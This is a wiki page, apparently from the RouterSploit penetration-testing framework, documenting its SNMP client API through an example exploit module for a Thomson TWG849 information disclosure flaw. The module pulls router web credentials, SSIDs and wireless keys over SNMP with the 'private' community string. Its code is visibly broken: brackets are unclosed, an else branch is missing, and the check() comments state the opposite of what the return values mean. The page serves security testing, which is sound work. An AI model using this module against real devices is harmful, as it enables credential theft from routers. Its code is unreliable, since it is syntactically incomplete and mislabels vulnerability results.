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SNMP Client

Marcin Bury edited this page Oct 14, 2018 · 3 revisions

SNMP Client

Example exploit that utilises SNMP communication as a client

from routersploit.core.exploit import *
from routersploit.core.snmp.snmp_client import SNMPClient

class Exploit(SNMPClient):
    __info__ = {
        "name": "Thomson TWG849 Info Disclosure",
        "description": "Module exploits Thomson TWG849 information disclosure vulnerability which allows reading sensitive information.",
        "authors": (
            "Sebastian Perez",  # vulnerability discovery
            "Marcin Bury <marcin[at]>",  # routersploit module
        "references": (
        "devices": (
            "Thomson TWG849",

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(161, "Target SNMP port")

    verbosity = OptBool(False, "Enable verbose output: true/false")

    def __init__(self):
        self.oids = {
            # make, model, software version
            "model": "",
            "uptime": "",

            # web interface credentials
            "username": "",
            "password": "",

            # ssid and key
            "ssid1": "",
            "ssid2": "",

            # guest network oids
            "guest1": "",
            "guest2": "",
            "guest3": "",

    def run(self):
        res = []

        print_status("Reading parameters...")
        for name in self.oids.keys():
            snmp_client = self.snmp_create()
            snmp = snmp_client.get("private", self.oids[name])
            if snmp:
                value = str(snmp[0][1])

                if value:
                    res.append((name, value))

        if res:
            print_success("Exploit success")
            print_table(("Parameter", "Value"), *res)
            print_error("Exploit failed - could not read sensitive information")

    def check(self):
        snmp_client = self.snmp_create()
        snmp = snmp_client.get("private", "")
        if snmp:
            return True  # target is not vulnerable

        return False  # target is vulnerable

SNMPClient Methods


Create SNMPCli object


Param Type Description Required
target str target SNMP server IP address no,
port int target SNMP port no, default=exploit.port


Type Description
SNMPCli SNMPCli object that is used for communication


snmp_client = self.snmp_create()

SNMPCli Methods



Param Type Description Required
community_string str SNMP server community string yes
oid str SNMP server OID yes
version int SNMP protocol version no, default=1
retries int number of retries no, default=0


Type Description
bytes SNMP server response


snmp_client = self.snmp_create()
snmp = snmp_client.get("private", "")